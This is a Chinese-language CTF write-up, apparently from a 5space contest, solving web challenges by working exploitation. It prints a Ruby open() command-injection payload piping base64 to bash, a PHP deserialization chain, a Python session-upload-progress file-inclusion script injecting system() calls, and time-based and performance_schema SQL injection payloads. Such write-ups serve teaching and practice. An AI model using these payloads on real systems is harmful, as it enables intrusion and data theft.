文章目录
MISC签到 WEBWebFTPPNG图片转换器pklovecloudEasyCleanupyet_another_mysql_injectionMISC
签到
flag{welcometo5space}
WEB
WebFTP
目录扫描发现git泄露
使用GitHack尝试还原代码
发现无法还原源代码,但是发现了几个可以正常访问的文件,其中最为有用的就是这个探针:/Readme/mytz.php
无法还原源码,但是在访问/.git/config时发现了源码在github上的项目
下载,搜索引擎没找到什么可利用的洞。查看探针,尝试看看先出一个phpinfo看看一些基本信息
发现了查看phpinfo的方法
查看phpinfo时,尝试找了下有没有将flag写进环境变量的情况时发现flag
PNG图片转换器
ruby的源代码
require 'sinatra'require 'digest'require 'base64'get '/' doopen("./view/index.html", 'r').read()endget '/upload' doopen("./view/upload.html", 'r').read()endpost '/upload' dounless params[:file] && params[:file][:tempfile] && params[:file][:filename] && params[:file][:filename].split('.')[-1] == 'png'return "<script>alert('error');location.href='/upload';</script>"endbeginfilename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + '.png'open(filename, 'wb') {|f|f.write open(params[:file][:tempfile],'r').read()}"Upload success, file stored at #{filename}"rescue'something wrong'endendget '/convert' doopen("./view/convert.html", 'r').read()endpost '/convert' dobeginunless params['file']return "<script>alert('error');location.href='/convert';</script>"endfile = params['file']unless file.index('..') == nil && file.index('/') == nil && file =~ /^(.+)\.png$/return "<script>alert('dont hack me');</script>"endres = open(file, 'r').read()headers 'Content-Type' => "text/html; charset=utf-8""var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"rescue'something wrong'endend
漏洞利用的关键点是这一行
res = open(file, 'r').read()
参考:/#/environments/ruby/CVE--17405/
这里使用了open()函数来打开可控制file参数传入的文件名。而ruby中的open()函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。
源码中会将open()执行过后的结果base64编码后返回,加上file参数处有些过滤和必须以.png结尾的限制;即可构造
file=|whoami > test.png
如果返回something wrong,可以尝试多执行几次。
接下来绕过..、/即可,直接利用base64编码绕过
file=|echo "bHMgLWxoYSAv"|base64 -d|bash > test.png
读取/FLA9_zAIBhoJmWSX9RUcnPDrL
file=|echo "Y2F0IC9GTEE5X3pBSUJob0ptV1NYOVJVY25QRHJM"|base64 -d|bash > test.png
pklovecloud
<?php include 'flag.php';class pkshow {function echo_name(){return "Pk very safe^.^";} } class acp {protected $cinder; public $neutron;public $nova;function __construct() {$this->cinder = new pkshow;} function __toString(){if (isset($this->cinder)) return $this->cinder->echo_name();} } class ace{public $filename;public $openstack;public $docker; function echo_name(){$this->openstack = unserialize($this->docker);$this->openstack->neutron = $heat;if($this->openstack->neutron === $this->openstack->nova){$file = "./{$this->filename}";if (file_get_contents($file)) {return file_get_contents($file); } else {return "keystone lost~"; } }} } if (isset($_GET['pks'])) {$logData = unserialize($_GET['pks']);echo $logData; } else {highlight_file(__file__); }?>
简单的反序列化,需要注意下的就是两个对象相互嵌套时注意区分,不要陷入死循环
<?php class acp {protected $cinder; public $neutron;public $nova;function __construct($i) {if($i == 1){$this->cinder = new ace();}else{return $i;}} } class ace{public $filename = '/flag.php';public $openstack;public $docker; function __construct(){$this->docker = serialize(new acp(0));}} $res = new acp(1);echo urlencode(serialize($res));?>
O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A9%3A%22%2Fflag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A61%3A%22O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BN%3Bs%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D
EasyCleanup
<?phpif(!isset($_GET['mode'])){highlight_file(__file__);}else if($_GET['mode'] == "eval"){$shell = $_GET['shell'] ?? 'phpinfo();';if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");eval($shell);}if(isset($_GET['file'])){if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");include $_GET['file'];}function filter($var): bool{$banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];foreach($banned as $ban){if(strstr($var, $ban)) return True;}return False;}function checkNums($var): bool{$alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';$cnt = 0;for($i = 0; $i < strlen($alphanum); $i++){for($j = 0; $j < strlen($var); $j++){if($var[$j] == $alphanum[$i]){$cnt += 1;if($cnt > 8) return True;}}}return False;}?>
合并运算符(??)
$shell = $_GET['shell'] ?? 'phpinfo();'
如果有设置?shell,则?shell的值为其设置的值;若没有设置,则?shell=phpinfo();
审计源码,很明显这里直接命令执行应该是无法执行的:
总长度不能大于等于15数字和字母的字符次数不能大于等于8次
加上一些filter()的过滤,这里基本无法实现?shell的命令执行
关键在include $_GET['file'];,有文件包含,虽然有filter()和长度的限制,但是没有最恶心的CheckNums();加上给了我们一个phpinfo。查看一下session.upload_progress,默认都是开启的。并且这里记录上传进度的session文件都没有开启自动清除(session.upload_progress.cleanup==Off),条件竞争都不用做了。
没有给出session.save_path,那sesion应该就是默认保存位置:/tmp/sess_xxx
直接利用以前做session upload progress的脚本即可,稍微改一下就能直接打
# -*- coding: utf-8 -*-import ioimport requestsimport threadingmyurl = 'http://114.115.134.72:32770/index.php'sessid = '7'myfile = io.BytesIO(b'mochu7' * 1024)writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('ls -lha /');?>"}mycookie = {'PHPSESSID': sessid}def writeshell(session):while True:resp = requests.post(url=myurl, data=writedata, files={'file': ('mochu7.txt', myfile)}, cookies=mycookie)def getshell(session):while True:payload_url = myurl + '?file=' + '/tmp/sess_' +sessidresp = requests.get(url=payload_url)if 'upload_progress' in resp.text:print(resp.text)breakelse:passif __name__ == '__main__':session = requests.session()writeshell = threading.Thread(target=writeshell, args=(session,))writeshell.daemon = Truewriteshell.start()getshell(session)
如果一个sess_id打了好几次没有刷新,建议换个sess_id打
yet_another_mysql_injection
查看源码发现提示
<?phpinclude_once("lib.php");function alertMes($mes,$url){die("<script>alert('{$mes}');location.href='{$url}';</script>");}function checkSql($s) {if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){alertMes('hacker', 'index.php');}}if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {$username=$_POST['username'];$password=$_POST['password'];if ($username !== 'admin') {alertMes('only admin can login', 'index.php');}checkSql($password);$sql="SELECT password FROM users WHERE username='admin' and password='$password';";$user_result=mysqli_query($con,$sql);$row = mysqli_fetch_array($user_result);if (!$row) {alertMes("something wrong",'index.php');}if ($row['password'] === $password) {die($FLAG);} else {alertMes("wrong password",'index.php');}}if(isset($_GET['source'])){show_source(__FILE__);die;}?>
password处可以进行延迟注入的,
import requestsburp0_url = "http://114.115.143.25:32770/index.php"burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/0101 Firefox/92.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded",}all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"query_str = ''for length in range(1, 20):for char in all_print_str:payload = "mochu7'or/**/if(ascii(mid(database(),{0},1))/**/like/**/{1},benchmark(20000000,md5('mochu7')),1)#".format(length, ord(char))burp0_data = {"username": "admin", "password": payload}resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)# print('{} : {} : {}'.format(length, char, resp.elapsed.total_seconds()))if resp.elapsed.total_seconds() > 3:query_str += charprint(query_str)else:continue
数据库是ctf。但是查password字段的时候发现无法查询出数据。这张表应该是张空表。
那么只能想办法构造出$row['password'] === $password
参考Nu1L战队的Writeup的思路:/dweb2/index/group/824215518412
performance_schema.threads表中的PROCESSLIST_INFO会记录线程正在执行的完整语句
/doc/refman/5.7/en/performance-schema-threads-table.html
但是in被过滤,所以这里需要用无列名注入,PROCESSLIST_INFO是performance_schema.threads表中的第11个字段。
当我们插入这条payload之后,整条的查询语句
SELECT password FROM users WHERE username='admin' and password='1'union/**/select/**/mid(`11`,65,217)/**/from(select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/union/**/select/**/*/**/from/**/performance_schema.threads/**/where/**/name/**/like'%connection%'/**/limit/**/1,1)t#
查询语句中的内联注释符/**/,是被记录成空格的。
SELECT password FROM users WHERE username='admin' and password='1'union select mid(`11`,65,217) from(select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 union select * from performance_schema.threads where name like'%connection%' limit 1,1)t#
可以看到,最后截断PROCESSLIST_INFO记录的语句得到查询结果和我们输入的password的参数是一样的。
构造出$row['password'] === $password,即可得到flag
